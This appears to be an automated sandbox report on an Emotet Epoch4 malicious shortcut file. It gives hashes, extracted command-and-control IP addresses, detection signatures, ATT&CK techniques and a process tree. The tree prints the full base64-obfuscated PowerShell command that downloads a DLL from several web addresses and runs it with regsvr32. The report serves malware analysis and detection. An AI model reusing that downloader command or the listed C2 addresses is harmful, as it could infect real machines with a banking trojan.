emotet | 3e3b827cf8b350d18fc92feb1c7bafd89ca2239eb903bef27bdc06a41de98b57

Target

UU3444499999999AA.lnk
Size

3KB
MD5

08205fbc8d439bb4dbded1b3b4146daa
SHA1

f07b89b0bb7691406f109e6be7d59551efa91fc7
SHA256

3e3b827cf8b350d18fc92feb1c7bafd89ca2239eb903bef27bdc06a41de98b57
SHA512

c1045c4ab9ce5e3fe0b2c13521b75e824b1501c626782aad55a20923d88ecdc9c0f28fd0b6f005dc5ea69b8af50bd7bb5963f389da55a4e7fc74fa8defbbc902

Score

10^/10

emotet epoch4 banker suricata trojan

Malware Config

Extracted

Family

emotet

Botnet

Epoch4

149.56.131.28:8080

72.15.201.15:8080

207.148.79.14:8080

82.165.152.127:8080

46.55.222.11:443

213.241.20.155:443

163.44.196.120:8080

51.254.140.238:7080

107.170.39.149:8080

188.44.20.25:443

82.223.21.224:8080

172.104.251.154:8080

164.68.99.3:8080

101.50.0.91:8080

129.232.188.93:443

173.212.193.249:8080

103.132.242.26:8080

186.194.240.217:443

37.187.115.122:8080

91.207.28.33:8080

eck1.plain

ecs1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata

Blocklisted process makes network request 3 IoCs

flow	pid	Process
5	3064	powershell.exe
14	3064	powershell.exe
16	3064	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 2 IoCs

pid	Process
4968	regsvr32.exe
1840	regsvr32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3064	powershell.exe
3064	powershell.exe
4968	regsvr32.exe
4968	regsvr32.exe
1840	regsvr32.exe
1840	regsvr32.exe
1840	regsvr32.exe
1840	regsvr32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2160 wrote to memory of 3064	2160	cmd.exe	81
PID 2160 wrote to memory of 3064	2160	cmd.exe	81
PID 3064 wrote to memory of 4968	3064	powershell.exe	84
PID 3064 wrote to memory of 4968	3064	powershell.exe	84
PID 4968 wrote to memory of 1840	4968	regsvr32.exe	86
PID 4968 wrote to memory of 1840	4968	regsvr32.exe	86

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\UU3444499999999AA.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'/ZIIDxaZ4eOrVrXwvO7wSOLQe/f4UxLlrO9bmR5Uq4eReEdw+a2fZRMSDRMsW+yRtA38AWvk';$Hkc='JlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vbmljb2xhc3Nwb3J0YWZvbGlvLmF0d2VicGFnZXMuY29tL2Nzcy94S0FLYXpDVE4vIiwiaHR0cDovL3d3dy5haGFuLm9yZy5way9jYXRhbG9ndWVzL3YzLyIsImh0dHA6Ly9ucmMtc29sdWNpb25lcy5jb20uYXIvY2dpLWJpbi9uOWIwQTlOM0pScks2TXkvIiwiaHR0cDovL3d3dy5hZ3JldHRvLmNvbS9UZW1wbGF0ZS9qRURZQ1ltOG50SnQwU3EvIiwiaHR0cHM6Ly9teWFubWFyY2hlZnMuY29tL3dwLWNvbnRlbnQvS3VHNFc3aC8iLCJodHRwOi8vd29vbGxvb21vb2xvby5ubC9jZ2ktYmluL3pJZHdOQzJkLyIpOyR0PSJlblBNTXZSbiI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxLS0h3RUx3Y29YLnJLVTtSZWdzdnIzMi5leGUgIiRkXEtLSHdFTHdjb1gucktVIjticmVha30gY2F0Y2ggeyB9fQ==';$ZYCJ='IFdyaXRlLUhvc3QgInNBYlZTIjskUHJvZ3Jlc3NQcmVmZX';$ZYCJ=$ZYCJ+$Hkc;$EL=$ZYCJ;$gFtY=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($EL));$EL=$gFtY;iex($EL)}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\system32\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\enPMMvRn\KKHwELwcoX.rKU
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4968
  - - C:\Windows\system32\regsvr32.exe
      C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FmUnBdlMRHO\pcsgrSSvMqxuvCS.dll"
      4⤵
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:1840

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\enPMMvRn\KKHwELwcoX.rKU

Filesize
459KB

MD5
bddd7e892c878e6cada23f13d48b6d13

SHA1
3044ab0f3e85d402da2e66933da34b9333027756

SHA256
f54d82b18ff1b0aa0adaa6d8e78e2f828550046539b3db84b5d4f4e9bede5700

SHA512
52ac6461425d9ea6538c7065f4650611a3ee5aca5b9660c695dd7485d3c89d0a52263ea252e77be259757bbf1ecc6e4da2a7235723149375d95a786c7ad24cf0

Download Submit
C:\Users\Admin\AppData\Local\enPMMvRn\KKHwELwcoX.rKU

Filesize
459KB

MD5
bddd7e892c878e6cada23f13d48b6d13

SHA1
3044ab0f3e85d402da2e66933da34b9333027756

SHA256
f54d82b18ff1b0aa0adaa6d8e78e2f828550046539b3db84b5d4f4e9bede5700

SHA512
52ac6461425d9ea6538c7065f4650611a3ee5aca5b9660c695dd7485d3c89d0a52263ea252e77be259757bbf1ecc6e4da2a7235723149375d95a786c7ad24cf0

Download Submit
C:\Windows\System32\FmUnBdlMRHO\pcsgrSSvMqxuvCS.dll

Filesize
459KB

MD5
bddd7e892c878e6cada23f13d48b6d13

SHA1
3044ab0f3e85d402da2e66933da34b9333027756

SHA256
f54d82b18ff1b0aa0adaa6d8e78e2f828550046539b3db84b5d4f4e9bede5700

SHA512
52ac6461425d9ea6538c7065f4650611a3ee5aca5b9660c695dd7485d3c89d0a52263ea252e77be259757bbf1ecc6e4da2a7235723149375d95a786c7ad24cf0

Download Submit
memory/3064-131-0x00000270D3300000-0x00000270D3322000-memory.dmp

Filesize
136KB

Download
memory/3064-132-0x00007FFE0F180000-0x00007FFE0FC41000-memory.dmp

Filesize
10.8MB

Download
memory/3064-133-0x00000270D3E20000-0x00000270D45C6000-memory.dmp

Filesize
7.6MB

Download
memory/3064-140-0x00007FFE0F180000-0x00007FFE0FC41000-memory.dmp

Filesize
10.8MB

Download
memory/4968-137-0x0000000180000000-0x000000018002A000-memory.dmp

Filesize
168KB

Download